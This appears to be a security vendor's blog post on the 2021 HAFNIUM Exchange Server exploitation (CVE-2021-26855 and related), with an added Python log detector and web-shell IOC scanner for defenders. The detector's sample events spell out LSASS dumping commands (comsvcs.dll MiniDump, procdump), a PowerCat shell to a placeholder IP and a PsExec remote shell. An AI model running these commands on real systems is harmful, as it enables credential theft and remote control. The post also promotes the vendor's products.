Microsoft recently published details of an attack showing how a threat actor used zero-day exploits to access Microsoft Exchange Servers. The new exploit enabled access to email accounts and allowed the installation of additional malware to facilitate long-term access to victim environments.
The campaign was initially attributed to the HAFNIUM Group, but it is now evident that multiple other groups are actively exploiting the vulnerability. HAFNIUM Group is a Chinese cyber espionage group that is known to compromise victims by exploiting vulnerabilities in internet-facing servers. They typically leverage legitimate open-source frameworks, like Covenant, for command and control and exfiltrate the victim’s data via file sharing sites like Mega.
Microsoft released security updates on March 2nd to mitigate four critical Exchange vulnerabilities (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065). The affected server versions are Microsoft Exchange Server 2013, 2016, and 2019.
The initial phase of the attack requires only the ability to make an untrusted connection to the Exchange server on port 443. The attacker leverages CVE-2021-26855 to gain initial access to the organization’s Exchange Server. This CVE is a server-side request forgery (SSRF) vulnerability that allows the attacker to send arbitrary HTTP requests and authenticate as the Exchange server. What makes this CVE particularly concerning is that exploitation requires no user interaction and no prior access to files or settings: the attacker simply needs to reach the server’s known IP address or FQDN over the untrusted 443 port.
| | CVE-2021-26855 | CVE-2021-26857 | CVE-2021-26858, CVE-2021-27065 |
|---|---|---|---|
| CVE Description | server-side request forgery (SSRF) vulnerability in Exchange | insecure deserialization vulnerability in the Unified Messaging service | post-authentication arbitrary file write vulnerability in Exchange |
| Attack Vector | Network | Local | Local |
| Attack Complexity | Low | Low | Low |
| Privileges Required | None | None | None |
| User Interaction | None | Required | Required |
| Exploit code maturity | Functional | Functional | Functional |
| Additional Information | | Exploiting this vulnerability would give attackers the ability to run code as SYSTEM on the Exchange Server; this requires admin permission or another vulnerability to exploit. | Attackers could use this vulnerability to write a file to any path on the server. Authentication is required, which can be gained by exploiting the CVE-2021-26855 SSRF vulnerability or by compromising a legitimate admin’s credentials. |
CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065 do require user interaction, and as such the attacker would first need to exploit CVE-2021-26855 or compromise the Exchange server in a different way.
Organizations are at high risk of exploitation if Exchange Servers are published directly to the Internet. As an alternative, we recommend allowing access to Exchange via a VPN connection or publishing Exchange via Reverse Proxy. This will significantly reduce the risk of a breach.
True defense-in-depth means stopping attacks that have moved beyond the initial phases of the chain before they cause damage. After initial access and privilege escalation, there are multiple points where the abuse of process memory is necessary for the threat actor to continue the attack chain. It is important to have controls in place that can stop these non-negotiable tactics.
In the Exchange scenario, the threat actors will typically dump LSASS process memory with Procdump and comsvcs.dll. They’ll also use PsExec and PowerCat to connect and send commands to remote systems. Finally, they will use PowerShell, Nishang, and Covenant frameworks to make changes including creating a reverse shell and creating new user accounts. If the Exchange server is protected by Morphisec Keep, many key phases of the attack will be mitigated, and the risk of a breach is significantly diminished even if all pre-execution protection mechanisms were bypassed.
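The post-exploitation tooling named above (LSASS dumps via Procdump or comsvcs.dll, PsExec, PowerCat) leaves characteristic process-creation records that a SOC can alert on regardless of which patch level the server is at. The following detection logic is an added example written for this post; it is not Morphisec's or Microsoft's code. The record format and the sample events are constructed to resemble Windows 4688 / Sysmon process-creation logs; the hostnames, PIDs and the 192.0.2.10 address are placeholders. The first rule (an IIS worker process spawning a shell) is not named in the post but is the typical consequence of the web shell the post describes.

```python
"""Flag process-creation events matching the HAFNIUM post-exploitation
tooling described in the post: comsvcs.dll / Procdump LSASS dumps, PsExec,
PowerCat, and cmd/powershell spawned by the IIS worker process (w3wp.exe).

Added example, not Morphisec's or Microsoft's code. All events below are
constructed samples; the record format is a simplified 4688/Sysmon style.
"""
from __future__ import annotations

import re
from dataclasses import dataclass

# Constructed records: "<timestamp> host=<name> parent=<image> cmd="<command line>""
SAMPLE_EVENTS = [
    r'2021-03-03T10:01:02Z host=EXCH01 parent=w3wp.exe cmd="cmd.exe /c whoami"',
    r'2021-03-03T10:02:11Z host=EXCH01 parent=cmd.exe cmd="rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump 624 C:\Windows\Temp\l.dmp full"',
    r'2021-03-03T10:03:40Z host=EXCH01 parent=cmd.exe cmd="procdump64.exe -accepteula -ma lsass.exe C:\Windows\Temp\ls.dmp"',
    r'2021-03-03T10:05:00Z host=EXCH01 parent=cmd.exe cmd="powershell.exe -nop -c powercat -c 192.0.2.10 -p 443"',
    r'2021-03-03T10:06:30Z host=WS22 parent=explorer.exe cmd="notepad.exe C:\Users\jdoe\notes.txt"',
    r'2021-03-03T10:07:15Z host=EXCH01 parent=cmd.exe cmd="PsExec.exe \\FS01 -s cmd.exe"',
]

EVENT_RE = re.compile(
    r'^(?P<ts>\S+) host=(?P<host>\S+) parent=(?P<parent>\S+) cmd="(?P<cmd>.*)"$'
)


@dataclass
class Finding:
    timestamp: str
    host: str
    rule: str
    command_line: str


def classify(parent: str, cmd: str) -> list[str]:
    """Return the names of every detection rule the event matches."""
    lowered = cmd.lower()
    # Image name = first token of the command line, stripped of any directory.
    image = lowered.split()[0].rsplit("\\", 1)[-1] if lowered.strip() else ""
    hits: list[str] = []

    # Web shell activity: the IIS worker process should never spawn a shell.
    if parent.lower() == "w3wp.exe" and image in {"cmd.exe", "powershell.exe"}:
        hits.append("iis-worker-spawned-shell")

    # Credential theft: MiniDump export of comsvcs.dll invoked through rundll32.
    if "comsvcs.dll" in lowered and "minidump" in lowered:
        hits.append("lsass-dump-comsvcs")

    # Credential theft: Sysinternals Procdump pointed at lsass (or a full dump).
    if image.startswith("procdump") and ("lsass" in lowered or " -ma " in lowered):
        hits.append("lsass-dump-procdump")

    # Lateral movement: PsExec client, or its service image on the target side.
    if image in {"psexec.exe", "psexec64.exe"} or "psexesvc" in lowered:
        hits.append("psexec-lateral-movement")

    # Remote shell / relay tooling.
    if "powercat" in lowered:
        hits.append("powercat-remote-shell")

    return hits


def detect(lines: list[str]) -> list[Finding]:
    """Parse each record and emit one Finding per matching rule."""
    findings: list[Finding] = []
    for line in lines:
        match = EVENT_RE.match(line)
        if not match:
            continue  # malformed record: skip rather than abort the whole batch
        for rule in classify(match["parent"], match["cmd"]):
            findings.append(Finding(match["ts"], match["host"], rule, match["cmd"]))
    return findings


if __name__ == "__main__":
    for finding in detect(SAMPLE_EVENTS):
        print(f"{finding.timestamp} {finding.host} [{finding.rule}] {finding.command_line}")
```

Each rule keys on the tool's invocation pattern rather than a file hash, so renaming the binary alone does not evade it; the comsvcs.dll rule in particular catches LSASS dumping that uses only a signed Windows component.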
Other vectors of exploiting these vulnerabilities assume an already compromised network. This may involve opening a malicious phishing email to initiate communication with the Exchange Server from within the network. Morphisec prevents these types of attacks by using moving target defense technology to create a zero-trust runtime environment for server workloads.
In the event that a breach has or may have occurred, Morphisec’s Incident Response Team can assist. Our Incident Response service will contain the incident and provide visibility into the extent of damage from the attack. The team will also offer actionable recommendations to reduce the risk and exposure of the threat going forward.
Proper configuration of the OS and its native controls can thwart even the most advanced threats. Additionally, it is critical to apply relevant security updates on vulnerable servers.
We anticipate that ransomware groups will take advantage of these vulnerabilities to deploy ransomware. One indication of this has already been seen in the wild with the deployment of Cobalt Strike beacons on Exchange servers.
Our immediate recommendation to customers and prospects is to patch these vulnerabilities, or to have adequate compensating controls such as Morphisec deployed to reduce the risk effectively.
The Exchange Server team has published a script that checks for HAFNIUM IOCs, updated to address performance and memory concerns. That script is available here: https://github.com/microsoft/CSS-Exchange/tree/main/Security.
If relevant artifacts from the above IOCs are found on the Exchange server, or an 8-character .aspx file is found in the C:\Inetpub\wwwroot\aspnet_client\system_web\ directory, an incident response should be initiated. Morphisec can help with this even if the organization is not a customer.
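The file-based IOC above is easy to check without waiting for the full Microsoft script. The scanner below is an added example for this post, not the CSS-Exchange script or Morphisec's code. It walks a web root, flags an 8-character .aspx file under aspnet_client\system_web\ as a high-confidence match for the IOC the post describes, and reports any other .aspx file under aspnet_client at lower confidence, since that folder normally holds client-side script, not server pages (that broader rule is this example's generalization, not something the post states). The sample directory tree, file names and contents are constructed so the script runs offline; on a suspect server you would point scan_webroot() at C:\Inetpub\wwwroot instead.

```python
"""Scan an IIS web root for the HAFNIUM web shell artefact described in the
post: an 8-character .aspx file under aspnet_client\\system_web\\.

Added example, not Microsoft's CSS-Exchange script. build_sample_webroot()
creates a constructed directory tree in a temp folder for demonstration.
"""
import os
import re
import tempfile
from pathlib import Path

# Exact IOC from the post: eight alphanumeric characters plus the .aspx extension.
EIGHT_CHAR_ASPX = re.compile(r"^[A-Za-z0-9]{8}\.aspx$", re.IGNORECASE)


def scan_webroot(webroot: str) -> list:
    """Return a list of findings, each a dict with path, severity and reason.

    Paths are reported relative to the web root using the host's separator.
    """
    root = Path(webroot)
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        rel_dir = Path(dirpath).relative_to(root)
        parts = [p.lower() for p in rel_dir.parts]
        for name in files:
            if not name.lower().endswith(".aspx"):
                continue
            rel_file = str(rel_dir / name)
            if parts[:2] == ["aspnet_client", "system_web"] and EIGHT_CHAR_ASPX.match(name):
                findings.append({
                    "path": rel_file,
                    "severity": "high",
                    "reason": "8-character .aspx in aspnet_client\\system_web (matches published IOC)",
                })
            elif parts[:1] == ["aspnet_client"]:
                findings.append({
                    "path": rel_file,
                    "severity": "medium",
                    "reason": "server page under aspnet_client, which normally holds only client script",
                })
    return findings


def build_sample_webroot() -> str:
    """Create a constructed web root in a temp dir and return its path.

    Contents are placeholders: the .js file stands in for legitimate client
    script, logon.aspx for a legitimate OWA page, the other .aspx files for
    artefacts that should be investigated.
    """
    root = Path(tempfile.mkdtemp(prefix="webroot_sample_"))
    sample_files = {
        "aspnet_client/system_web/4_0_30319/WebUIValidation.js": "// constructed client script",
        "aspnet_client/system_web/ab12cd34.aspx": "<%-- constructed placeholder --%>",
        "aspnet_client/system_web/toolong123.aspx": "<%-- constructed placeholder --%>",
        "aspnet_client/helper.aspx": "<%-- constructed placeholder --%>",
        "owa/auth/logon.aspx": "<%-- constructed placeholder for a legitimate page --%>",
    }
    for rel, content in sample_files.items():
        target = root / Path(rel)
        target.parent.mkdir(parents=True, exist_ok=True)
        target.write_text(content)
    return str(root)


if __name__ == "__main__":
    sample_root = build_sample_webroot()
    for finding in scan_webroot(sample_root):
        print(f"{finding['severity'].upper():6} {finding['path']}  ({finding['reason']})")
```

Any "high" hit should be preserved rather than deleted (the file's timestamps, owner and contents are evidence for the incident response the post calls for), and "medium" hits are worth a manual look because legitimate Exchange installs do not place .aspx pages under aspnet_client.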